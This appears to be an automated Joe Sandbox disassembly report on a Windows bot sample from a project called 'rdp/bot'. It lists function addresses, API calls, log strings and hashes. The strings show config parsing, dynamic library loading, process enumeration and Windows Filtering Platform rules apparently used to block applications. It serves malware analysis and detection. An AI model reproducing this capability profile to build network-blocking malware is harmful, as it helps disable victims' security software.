ini_get_sec, xrefs: 00007FF64B939C02, 00007FF64B939C35, 00007FF64B939C68, 00007FF64B939CC6, 00007FF64B939D04
[D] (%s) -> Done(name=%s), xrefs: 00007FF64B939CCD
(ini != NULL), xrefs: 00007FF64B939BFB
C:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FF64B939BF4, 00007FF64B939C27, 00007FF64B939C5A
NULL, xrefs: 00007FF64B939D24
(name != NULL), xrefs: 00007FF64B939C2E

Memory Dump Source

Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true

Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd

Similarity

API ID: strcmp
String ID: (ini != NULL)$(name != NULL)$(sec != NULL)$C:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(name=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(name=%s,err=%08x)$ini_get_sec
API String ID: 1004003707-386092548
Opcode ID: 6e47ec395df7def9111e9242f569500123d62212d82881af74ded4e61f3f0c51
Instruction ID: 909dda394e66df0e1427f4262715d7a3ca35735bb8b34fab21560baf30d75d16
Opcode Fuzzy Hash: 6e47ec395df7def9111e9242f569500123d62212d82881af74ded4e61f3f0c51
Instruction Fuzzy Hash: 47413261A1C547A1FA50BB90E9447B52650BF5E348F58503AD92EC6DB3DF7CA949C300

Function 00007FF64B93A0F0 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 68
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_errno.MSVCRT ref: 00007FF64B93A18A
_errno.MSVCRT ref: 00007FF64B93A1A8
_errno.MSVCRT ref: 00007FF64B93A1B4

Strings

ini_get_uint32, xrefs: 00007FF64B93A169, 00007FF64B93A1D4
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF64B93A170
[E] (%s) -> strtoul failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d), xrefs: 00007FF64B93A1DB
(value != NULL), xrefs: 00007FF64B93A162
C:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FF64B93A15B

Memory Dump Source

Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true

Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd

Similarity

API ID: _errno
String ID: (value != NULL)$C:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> strtoul failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint32
API String ID: 2918714741-1670302297
Opcode ID: d5b82347f654392dfedf225542d4a438f2fa3c92b60559f822e1e5e0c15a5a93
Instruction ID: c691b107b1ad0cdf914510d4e780ba1d6995e0345116f2e1542a221f16c8244a
Opcode Fuzzy Hash: d5b82347f654392dfedf225542d4a438f2fa3c92b60559f822e1e5e0c15a5a93
Instruction Fuzzy Hash: D5215C62A0C64696E761BF55E8407AA3760BB4E784F444036EE4CC7A76DF3CE845C700

Function 00007FF64B9314E2 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 91
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

fwrite.MSVCRT ref: 00007FF64B93158E
fflush.MSVCRT ref: 00007FF64B93159A
EnterCriticalSection.KERNEL32 ref: 00007FF64B9315B3
LeaveCriticalSection.KERNEL32 ref: 00007FF64B9315DB
CopyFileA.KERNEL32 ref: 00007FF64B931638

Strings

., xrefs: 00007FF64B93161D
1, xrefs: 00007FF64B931622

Memory Dump Source

Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true

Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd

Similarity

API ID: CriticalSection$CopyEnterFileLeavefflushfwrite
String ID: .$1
API String ID: 513531256-1839485796
Opcode ID: 2960b9ecaab591c16170f553e21163bf5ef34305d8ef571820ba495a7a1ad153
Instruction ID: 4800a136b6c24a39cf25b379bc82ccfd8f807c88722fa9e9db3ca3e0293dbb02
Opcode Fuzzy Hash: 2960b9ecaab591c16170f553e21163bf5ef34305d8ef571820ba495a7a1ad153
Instruction Fuzzy Hash: 02414921A0C68686F320BB21E8543BA63A0BB8F784F444035DA5DC7BB7DF2CE5868740

Function 00007FF64B9376D0 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 128
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FwpmProviderDestroyEnumHandle0.FWPUCLNT ref: 00007FF64B937822
wcscmp.MSVCRT ref: 00007FF64B93786D

Strings

[E] (%s) -> FwpmProviderAdd0 failed(res=%08lx), xrefs: 00007FF64B937944
[E] (%s) -> FwpmProviderEnum0 failed(res=%08lx), xrefs: 00007FF64B9377F4
[E] (%s) -> FwpmProviderCreateEnumHandle0 failed(res=%08lx), xrefs: 00007FF64B9377D7
setup_filt_prov, xrefs: 00007FF64B9377D0, 00007FF64B9377ED, 00007FF64B93793D

Memory Dump Source

Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true

Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd

Similarity

API ID: DestroyEnumFwpmHandle0Providerwcscmp
String ID: [E] (%s) -> FwpmProviderAdd0 failed(res=%08lx)$[E] (%s) -> FwpmProviderCreateEnumHandle0 failed(res=%08lx)$[E] (%s) -> FwpmProviderEnum0 failed(res=%08lx)$setup_filt_prov
API String ID: 1522850966-2029202777
Opcode ID: cfef6c6a482798bbc893db55c7aea54bf54562ebcb0bebf47041dad21b7195c5
Instruction ID: 20a1295a974aaad5917e3afa71e7546fcf03fe7526ddaa8f02999ce1b5c6e9eb
Opcode Fuzzy Hash: cfef6c6a482798bbc893db55c7aea54bf54562ebcb0bebf47041dad21b7195c5
Instruction Fuzzy Hash: 11517F2661CB8185F761AB15F4807AA73A6FB89784F009135DA8DC7B6AEF3DD440CB80

Function 00007FF64B939621 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 89COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF64B9376D0: wcscmp.MSVCRT ref: 00007FF64B93786D

FwpmEngineClose0.FWPUCLNT(?,?,?,?,?,?,00000000,000002C49A9414D0,?,00007FF64B9314B4,?,?,00000001,00007FF64B9314D2), ref: 00007FF64B939701

Strings

[E] (%s) -> FwpmEngineOpen0 failed(res=%08lx), xrefs: 00007FF64B9396BA
ip4, xrefs: 00007FF64B93967A
app, xrefs: 00007FF64B9396E0
wfp_block, xrefs: 00007FF64B9396B3
svc, xrefs: 00007FF64B939728

Memory Dump Source

Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true

Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd

Similarity

API ID: Close0EngineFwpmwcscmp
String ID: [E] (%s) -> FwpmEngineOpen0 failed(res=%08lx)$app$ip4$svc$wfp_block
API String ID: 4239307310-774261742
Opcode ID: 223170b71a83859bd236603527b02e101a1366b76761d00b77943d3fd3401860
Instruction ID: c90c49334822fcd86f3e7201716a070b56364d1dbd46634279c276d8e629efa9
Opcode Fuzzy Hash: 223170b71a83859bd236603527b02e101a1366b76761d00b77943d3fd3401860
Instruction Fuzzy Hash: 52317E51B0D64341FB50BA69E5903BA1251AF6F3C4F502035EA5FCBEB7EE5CE8858740

Function 00007FF64B936497 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 66COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32 ref: 00007FF64B9364A0
GetLastError.KERNEL32 ref: 00007FF64B9364E5

Strings

[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF64B9364D2
fs_path_exists, xrefs: 00007FF64B9364CB
C:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FF64B9364BD
(path != NULL), xrefs: 00007FF64B9364C4

Memory Dump Source

Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true

Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd

Similarity

API ID: AttributesErrorFileLast
String ID: (path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_path_exists
API String ID: 1799206407-4111913120
Opcode ID: f583ca8543be24ae3375adeba7bba2d16d38a369a885381b74c55c94ac9ca331
Instruction ID: 506494c3b153d426165a0e83ea8d2f5a6e95f51e2d81560e80857852a65ee00c
Opcode Fuzzy Hash: f583ca8543be24ae3375adeba7bba2d16d38a369a885381b74c55c94ac9ca331
Instruction Fuzzy Hash: 3821C950E0C48382FBB47A58E48837962915F4F70AF606532D15ECBAFBCE5CEC859282

Function 00007FF64B931C73 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 38libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 00007FF64B931C93

Part of subcall function 00007FF64B9314E2: fwrite.MSVCRT ref: 00007FF64B93158E
Part of subcall function 00007FF64B9314E2: fflush.MSVCRT ref: 00007FF64B93159A

GetLastError.KERNEL32 ref: 00007FF64B931CC6

Strings

[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu), xrefs: 00007FF64B931CDD
[D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p), xrefs: 00007FF64B931CB3
module_get_proc, xrefs: 00007FF64B931CAC, 00007FF64B931CD6

Memory Dump Source

Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true

Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd

Similarity

API ID: AddressErrorLastProcfflushfwrite
String ID: [D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p)$[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu)$module_get_proc
API String ID: 1224403792-3063791425
Opcode ID: 56e6ba89d370b9234b5a5992d3a7c8533a6698b1ea8b213f9a8009716b16c25b
Instruction ID: b81ac146128e40aa949afbdd64130df0ff786f0d82b0db53062166706af40e32
Opcode Fuzzy Hash: 56e6ba89d370b9234b5a5992d3a7c8533a6698b1ea8b213f9a8009716b16c25b
Instruction Fuzzy Hash: 0BF08150B1C61381FE55B756E8005B56251BF4EBD0F584432DD5CCBBB6EE2CE9568310

Function 00007FF64B938A40 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29COMMON

Download Yara Rule

APIs

Process32Next.KERNEL32 ref: 00007FF64B938671
GetLastError.KERNEL32 ref: 00007FF64B93867D
CloseHandle.KERNEL32 ref: 00007FF64B938A16

Strings

[E] (%s) -> Process32Next failed(gle=%lu), xrefs: 00007FF64B938694
block_app, xrefs: 00007FF64B93868D

Memory Dump Source

Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true

Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd

Similarity

API ID: CloseErrorHandleLastNextProcess32
String ID: [E] (%s) -> Process32Next failed(gle=%lu)$block_app
API String ID: 1692733154-1215713629
Opcode ID: 3568a673c23024b7a528510d4250d5925bf8b2663cdb265cd0b878eaba4c314f
Instruction ID: 69212dd602f67136d918ad03503068f5743d8d2e29b3459047b50041e14000af
Opcode Fuzzy Hash: 3568a673c23024b7a528510d4250d5925bf8b2663cdb265cd0b878eaba4c314f
Instruction Fuzzy Hash: 95F01D91B0C60385FA64B768D8D417812A1AF4F748F506531C54EC6ABBDE3CE984C304

Function 00007FF64B9389D9 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29COMMON

Download Yara Rule

APIs

Process32Next.KERNEL32 ref: 00007FF64B938671
GetLastError.KERNEL32 ref: 00007FF64B93867D
CloseHandle.KERNEL32 ref: 00007FF64B938A16

Strings

[E] (%s) -> Process32Next failed(gle=%lu), xrefs: 00007FF64B938694
block_app, xrefs: 00007FF64B93868D

Memory Dump Source

Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true

Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd

Similarity

API ID: CloseErrorHandleLastNextProcess32
String ID: [E] (%s) -> Process32Next failed(gle=%lu)$block_app
API String ID: 1692733154-1215713629
Opcode ID: 92e1423703d3c376117564a88a64444d1e0736b766f2c3370c2fe957f1c671d4
Instruction ID: 5d4c6e83e818c50aab9d647f617d9fd46f01df580c87b8dc81117b8b9917fafc
Opcode Fuzzy Hash: 92e1423703d3c376117564a88a64444d1e0736b766f2c3370c2fe957f1c671d4
Instruction Fuzzy Hash: B0F01D91B0C60385FA64B768D8D417812A1AF4F748F506432C50EC6ABBDE3CE984C304

Function 00007FF64B9389E0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29COMMON

Download Yara Rule

APIs

Process32Next.KERNEL32 ref: 00007FF64B938671
GetLastError.KERNEL32 ref: 00007FF64B93867D
CloseHandle.KERNEL32 ref: 00007FF64B938A16

Strings

[E] (%s) -> Process32Next failed(gle=%lu), xrefs: 00007FF64B938694
block_app, xrefs: 00007FF64B93868D

Memory Dump Source

Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true

Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd

Similarity

API ID: CloseErrorHandleLastNextProcess32
String ID: [E] (%s) -> Process32Next failed(gle=%lu)$block_app
API String ID: 1692733154-1215713629
Opcode ID: bc6c4c71623ff024deb327412966a9805aff51230ecb063eae95e275db5d3ab1
Instruction ID: 9f9ffbf233207499a47c915557fff774d79150c4e3f169efc69d1016c9ea0f23
Opcode Fuzzy Hash: bc6c4c71623ff024deb327412966a9805aff51230ecb063eae95e275db5d3ab1
Instruction Fuzzy Hash: 2FF01D91B0C60385FA64B768D8D417812A1AF4F749F506531C50EC6ABBEE3CE984C304

Function 00007FF64B9389E7 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29COMMON

Download Yara Rule

APIs

Process32Next.KERNEL32 ref: 00007FF64B938671
GetLastError.KERNEL32 ref: 00007FF64B93867D
CloseHandle.KERNEL32 ref: 00007FF64B938A16

Strings

[E] (%s) -> Process32Next failed(gle=%lu), xrefs: 00007FF64B938694
block_app, xrefs: 00007FF64B93868D

Memory Dump Source

Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true

Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd

Similarity

API ID: CloseErrorHandleLastNextProcess32
String ID: [E] (%s) -> Process32Next failed(gle=%lu)$block_app
API String ID: 1692733154-1215713629
Opcode ID: 92e34874ae0ae98bf0a884f1fef47379aa5eb378dcd3c69f1e14fabf6c69f307
Instruction ID: daf9491c0b71d172740f06461ea421ab39dd6318ec70bd39cdc8b5d4aa838462
Opcode Fuzzy Hash: 92e34874ae0ae98bf0a884f1fef47379aa5eb378dcd3c69f1e14fabf6c69f307
Instruction Fuzzy Hash: BEF01D91B0C60385FA64B768D8D417812A1AF4F748F506432C50EC6ABBDE3CE984C704

Function 00007FF64B931CF4 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 28libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00007FF64B931D02

Part of subcall function 00007FF64B9314E2: fwrite.MSVCRT ref: 00007FF64B93158E
Part of subcall function 00007FF64B9314E2: fflush.MSVCRT ref: 00007FF64B93159A

GetLastError.KERNEL32 ref: 00007FF64B931D2E

Strings

[I] (%s) -> Done(name=%s,ret=0x%p), xrefs: 00007FF64B931D1D
module_load, xrefs: 00007FF64B931D16, 00007FF64B931D3A
[E] (%s) -> Failed(name=%s,gle=%lu), xrefs: 00007FF64B931D41

Memory Dump Source

Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true

Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd

Similarity

API ID: ErrorLastLibraryLoadfflushfwrite
String ID: [E] (%s) -> Failed(name=%s,gle=%lu)$[I] (%s) -> Done(name=%s,ret=0x%p)$module_load
API String ID: 4085810780-3386190286
Opcode ID: bc9657a6dfdbcedde1d2fd3d6a88db9a33a45d1f6bb91b054f3284ed97a3b4ff
Instruction ID: 72fe7ccc8b44d0f084db2495598c23b579550297e7519924a3ab571bc4fe6229
Opcode Fuzzy Hash: bc9657a6dfdbcedde1d2fd3d6a88db9a33a45d1f6bb91b054f3284ed97a3b4ff
Instruction Fuzzy Hash: 11F05E10F1E61B40FE55BB56EC405B02250AF1FBD4B482531CC2DD7B73ED1CA5968310

Function 00007FF64B934868 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF64B934B30

Strings

[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF64B934B6C
fs_file_read, xrefs: 00007FF64B934B65

Memory Dump Source

Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true

Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: d400ccc41f07d85efbaf118e831595e6118f2ccae4f921d648a8b05ec38435d3
Instruction ID: 769905a02f93f4641b0fa277ade33fa2edf65550ec77602944cc6a91a029ed31
Opcode Fuzzy Hash: d400ccc41f07d85efbaf118e831595e6118f2ccae4f921d648a8b05ec38435d3
Instruction Fuzzy Hash: AFF05E23B0C20351F992BA69F4407BD12512F8E761E4A1536CD5CCBBE3EE3DA8878200

Function 00007FF64B934872 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF64B934B30

Strings

[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF64B934B6C
fs_file_read, xrefs: 00007FF64B934B65

Memory Dump Source

Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true

Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: 1644c6a3bca8c6556b5bd2b4bce9513eb849d7e55eeff9f3b8f38a9682788697
Instruction ID: 29ae5b9a9fc11dc39a275a538e1ae2b7df3e3f448d2934274b8c77f8e487061f
Opcode Fuzzy Hash: 1644c6a3bca8c6556b5bd2b4bce9513eb849d7e55eeff9f3b8f38a9682788697
Instruction Fuzzy Hash: A4F05E23B0C20351F992BA69F4407BD12512F8E765E4A1536CD5CCBBE3EE3DA8878200

Function 00007FF64B93487C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF64B934B30

Strings

[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF64B934B6C
fs_file_read, xrefs: 00007FF64B934B65

Memory Dump Source

Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true

Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
